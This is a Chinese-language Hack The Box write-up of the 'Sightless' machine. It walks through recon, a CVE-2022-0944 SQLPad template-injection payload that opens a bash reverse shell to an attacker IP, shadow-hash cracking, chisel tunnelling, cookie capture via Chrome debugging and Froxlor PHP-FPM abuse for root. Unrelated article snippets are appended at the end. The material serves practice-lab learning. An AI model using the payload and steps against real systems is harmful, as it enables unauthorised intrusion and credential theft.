Hack The Box-Sightless
总体思路
CVE-2022-0944->密码破解->chrome调试->PHP-FPM命令执行
信息收集&端口利用
nmap -sSVC sightless.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 08:40 CST
Nmap scan report for sightless.htb
Host is up (0.84s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp
| tls-alpn:
|_ ftp
| ssl-cert: Subject: commonName=sightless.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-05-15T18:55:27
|_Not valid after: 2034-05-13T18:55:27
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server)
| Invalid command: try being more creative
|_ Invalid command: try being more creative
| tls-nextprotoneg:
|_ ftp
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
目标只开放了21、22和80端口,先看80端口信息
没有什么利用点
但是在提供的服务中,有一个重定向到了sqlpad.sightless.htb,将其加入hosts文件中访问
是一个sqlpad的组件,在有数据库用户密码的情况下能够连接到数据库并执行命令
CVE-2022-0944
在BP中能够发现其版本为6.10.0
搜索该版本漏洞,发现存在CVE-2022-0944
root@docker
过程为:点击连接->新建连接->选择MySQL作为数据库->在数据库当中输入payload->Test运行命令
#payload
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.2/9000 0>&1"') }}
发现直接就是root用户,怀疑当前在容器中
进一步查阅文件后,发现确实存在dockerenv文件
查看用户,发现还有michael和node两个用户
密码破解
michael@sightless
可能需要用到这两个用户登录到主机,查看shadow文件
将michael用户的hash值复制出来解密
使用该密码登录到主机
老样子三件套,查看sudo权限、suid权限和端口开放情况
sudo -l
find / -perm -u=s -f type 2>/dev/null
netstat -nltp
有一个8080端口可疑,转发到本地查看
#kali
chisel server -p 6150 --reverse
#target
chmod +x chisel
./chisel client 10.10.16.2:6150 R:8080:127.0.0.1:8080
是一个froxlor组件
一番尝试后好像也没有利用点
看看把另外几个端口代理出来
./chisel client 10.10.16.2:6150 R:3000:127.0.0.1:3000 R:8000:127.0.0.1:8080 R:41219:127.0.0.1:41219 R:43425:127.0.0.1:43425 R:44765:127.0.0.1:44765
chrome调试
使用bp的chrome进行调试
添加完后点击inspect fallback
能看到界面在登录和登录成功之间反复横跳,需要抓到登陆成功时候的cookie
替换后进入界面
PHP-FPM命令执行
root@sightless
找到PHP-FPM
按照他的格式添加命令
保存之后,重启一下服务
文件有了,需要再去修改一下权限才能查看
再按照刚刚的流程走一遍
复制到本地,修改权限后即可登录
相关文章:
Hack The Box-Sightless
总体思路 CVE-2022-0944->密码破解->chrome调试->PHP-FPM命令执行 信息收集&端口利用 nmap -sSVC sightless.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 08:40 CST Nmap scan report for sightless.htb Host is up (0.84s latency). Not sh…...
Linux驱动开发-字符设备驱动开发
linux 驱动开发1. 驱动程序的类型2. 驱动开发流程字符设备驱动 1. 基本概念2. 字符设备驱动的基本结构 架构字符设备驱动开发中常用的 API示例以下代码加入了设备类和设备实例的创建 linux 驱动开发 1. 驱动程序的类型 在 Linux 中,驱动程序主要有以下几种类型&am…...
好用的电脑录屏软件有哪些?推荐4款专业工具。
不同系统的电脑上面带有的录屏功能不一样,比如win10上面有Xbox game bar,Mac系统则用的是QuickTime Player,或者是使用快捷键“CommandShift5”。但更方便的,我自己认为是使用一些专业的录屏软件,他门的录制模式多,兼容…...
web基础之XSS
一、搭建XSS平台 安装 1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接: # 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载 https://github.com/fi…...
目标检测-小目标检测方法
小目标检测是计算机视觉中的一个挑战性问题,因为小目标往往在图像中占据的像素较少,容易被背景或其他物体干扰。为了有效地进行小目标检测,研究人员和工程师提出了多种方法和算法来提高检测精度。以下是一些针对小目标检测的有效方式和算法&a…...
连接数据库(以MySQL为例)
文章目录 前言一、数据库是什么?二、连接步骤 1.手动导入驱动包2.连接数据库总结 前言 面对应用程序的开发,普遍需要保存用户的海量数据。保存粮的库叫粮库,保存水的库叫水库,那么保存数据的库自然叫数据库。有了数据库࿰…...
Mysql高级教程
1.安装部署 安装依赖性: [rootmysql-node10 ~]# dnf install cmake gcc-c openssl-devel ncurses-devel.x86_64 libtirpc-devel-1.3.3-8.el7_4.x86_64.rpm rpcgen.x86_64 下载并解压源码包 [rootmysql-node10 ~]# tar zxf mysql-boost-5.7.44.tar.gz [rootmysql-no…...
基于Ubuntu2404搭建mysql8配置远程访问
使用系统为Ubuntu2404,mysql8版本为8.0.36 安装mysql apt install -y mysql-server设置开机自启动 systemctl enable --now mysql修改密码,似乎是bug,修改密码第一次不成功,第二次可以 mysql use mysql; update user set Host…...
前端工程师职业发展路线图
在前端开发领域,从一个新手成长为一名资深工程师需要经过一系列的学习和实践。以下是一份详细的前端工程师职业发展路线图,包括了从基础到高级的各个阶段。 入门阶段 1. 学习基础技术 HTML/HTML5:掌握网页结构和语义化标签的使用。CSS/CSS…...
人工智能(AI)正在以前所未有的速度融入我们生活的方方面面
人工智能将融入我们生活的方方面面 人工智能(AI)正在以前所未有的速度融入我们生活的方方面面,这种趋势在未来几年乃至几十年内将会持续加速。以下是一些人工智能已经或即将在各个领域产生深远影响的例子: 智能家居:…...
OpenCV-模板匹配多个目标
文章目录 一、基本概念二、基本步骤1.图像准备2.图像预处理3.执行模板匹配4.定位匹配区域5.处理多个匹配6.优化和验证 三、代码实现1.图片读取2.图像预处理3.模板匹配4.绘制矩形框 三、总结 模型匹配(Model Matching)是一个广泛应用的概念,其…...
uniapp 原生插件开发 UI
前言: 在集成某些特定 原生SDK的时候,它本身是带UI控件的。当我们使用 uniapp 开发app的时候实是 可以使使用 nvue 页面,以 weex 的方式嵌入原生的UI控件。 我这边的场景是 接入连连app的支付,它有个自己的密码键盘 控件是原生的页…...
性能测试-性能分析与调优原理总结
性能分析与调优如何下手,先从硬件开始,还是先从代码或数据库。 从操作系统(CPU调度,内存管理,进程调度,磁盘I/O)、网络、协议(HTTP, TCP/IP ),还是…...
【机器学习】4 ——熵
机器学习4 ——熵 文章目录 机器学习4 ——熵前言 前言 熵衡量随机变量不确定性,由克劳德香农(Claude Shannon)在1948年提出,称为香农熵。反映了一个系统中信息的混乱程度或信息量。 其定义为: H ( P ) − ∑ x P …...
linux命令用于删除文本文件中的重复行的命令uniq详解
目录 一、概述 二、基本用法 1、uniq 命令的基本语法 2、常用选项 3、获取帮助 三、主要功能 1. 识别并删除相邻重复行 2. 保留重复行的第一个实例 3. 统计重复次数 4. 忽略指定列的比较 四、示例 1. 删除相邻重复行 2. 显示每一行及其重复次数 3. 只显示重复行 4. …...
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
智驭未来,悦享生活 —— 探索智慧小区物业管理小程序 一、引言:智慧生活的新篇章 在这个日新月异的时代,科技正以前所未有的速度改变着我们的生活。从智能家居到智慧城市,每一处都闪耀着智慧的光芒。而今天,我要带大家…...
深度学习:怎么看pth文件的参数
.pth 文件是 PyTorch 模型的权重文件,它通常包含了训练好的模型的参数。要查看或使用这个文件,你可以按照以下步骤操作: 1. 确保你有模型的定义 你需要有创建这个 .pth 文件时所用的模型的代码。这意味着你需要有模型的类定义和架构。 2. …...
MMLU-Pro 基准测试数据集上线,含 12k 个跨学科复杂问题,难度提升,更具挑战性!DeepSeek 数学模型一键部署
在大语言模型 (LLM) 蓬勃发展的时代,诸如大规模多任务语言理解 (MMLU) 之类的基准测试,在推动 AI 于不同领域的语言理解与推理能力迈向极限方面,发挥着至关重要的关键作用。 然而,伴随模型的持续改进与优化,LLM 在这些…...
Vue | Vue深入浅出——Vue中的render函数详解
1.render函数 在编写vue单文件的大多数情况下,我们都是使用template模板来创建HTML。然而在一些条件判断比较复杂的场景下,使用JavaScript去描绘HTML的生成逻辑会显得更加的简洁直观。 使用Vue官网的例子来简单说明: 如果自己在开发的时候…...
数学基础 -- 线性代数之奇异值
奇异值与其应用 1. 奇异值定义 对于任意的矩阵 A A A(可以是方阵或非方阵),存在三个矩阵 U U U、 Σ \Sigma Σ 和 V V V,使得: A U Σ V T A U \Sigma V^T AUΣVT 其中: U U U 是一个 m m m \ti…...
BGE Reranker-v2-m3效果展示:原始分数与归一化分数双维度结果对比分析真实案例
BGE Reranker-v2-m3效果展示:原始分数与归一化分数双维度结果对比分析真实案例 1. 系统核心能力概览 BGE Reranker-v2-m3是一个基于先进AI技术的本地文本相关性重排序工具,专门用于评估查询语句与候选文本之间的匹配程度。这个工具的核心价值在于能够智…...
小程序毕业设计基于微信小程序的校园跑腿小程序
前言 在校园生活节奏紧凑、同学们事务繁忙的当下,Spring Boot 基于微信小程序的校园跑腿小程序应运而生,为师生们提供了便捷高效的代劳服务,让校园生活更加从容有序。借助 Spring Boot 强大的后端支撑以及微信小程序无需安装、触手可及的优势…...
UNIT-00:Berserk Interface辅助数据库课程设计:从ER图到SQL
UNIT-00:Berserk Interface辅助数据库课程设计:从ER图到SQL 你是不是正在为数据库课程设计发愁?面对一个模糊的业务需求,要从零开始画出清晰的ER图,再设计出规范化的数据库模式,最后还要写出一堆建表和查询…...
nlp_structbert_siamese-uninlu_chinese-base镜像免配置优势:自动检测CUDA/cuDNN版本并提示降级建议
nlp_structbert_siamese-uninlu_chinese-base镜像免配置优势:自动检测CUDA/cuDNN版本并提示降级建议 你是不是也遇到过这种头疼事?好不容易找到一个好用的AI模型,兴致勃勃地准备部署,结果一运行就报错——CUDA版本不匹配、cuDNN找…...
ModelScope与Hugging Face中文API调用全攻略:从安装到实战代码解析
ModelScope与Hugging Face中文API调用全攻略:从安装到实战代码解析 如果你正在寻找一个能够快速上手ModelScope和Hugging Face API的指南,特别是针对中文开发者的实用教程,那么你来对地方了。这两个平台作为当前最受欢迎的AI模型开源社区&…...
)
LangChain RAG实战:用PGVector把你的本地知识库变成智能问答机器人(Python代码详解)
LangChain RAG实战:用PGVector把你的本地知识库变成智能问答机器人(Python代码详解) 你是否曾经面对堆积如山的本地文档感到无从下手?PDF报告、Markdown笔记、TXT日志散落在各个文件夹,每次查找关键信息都像大海捞针。…...
微信小程序onLaunch异步问题实战:如何确保Page的onLoad在onLaunch完成后执行?
微信小程序异步初始化难题:5种方案确保onLaunch与onLoad的执行顺序 微信小程序的启动流程看似简单,却隐藏着一个让不少开发者踩坑的异步陷阱。当你在app.js的onLaunch中进行网络请求或异步操作时,页面层级的onLoad可能已经迫不及待地开始执行…...
)
别再只用ChatGPT了!用JavaScript的Web Speech API给你的网页加个‘嘴’(附完整代码)
用Web Speech API给你的网页装个"智能语音助手":从基础到实战 当我们在讨论网页交互创新时,大多数人会立刻想到复杂的AI对话系统。但你可能不知道,浏览器原生就内置了一个被严重低估的语音合成神器——Web Speech API。想象一下&am…...
告别Softmax分类头:用K-Means思想在PyTorch里实现语义分割原型网络
告别Softmax分类头:用K-Means思想在PyTorch里实现语义分割原型网络 当你在Cityscapes数据集上调试语义分割模型时,是否遇到过这样的困境:增加新类别需要重新调整分类头参数,模型在复杂场景下对同类物体的多样性特征捕捉不足&#…...
MusePublic离线素材库:内置1000+优质Prompt模板一键调用
MusePublic离线素材库:内置1000优质Prompt模板一键调用 1. 项目简介:你的专属艺术人像创作引擎 想象一下,你是一位时尚摄影师或数字艺术家,脑海中有一个绝妙的画面:一位身着复古长裙的模特,在黄昏的巴黎街…...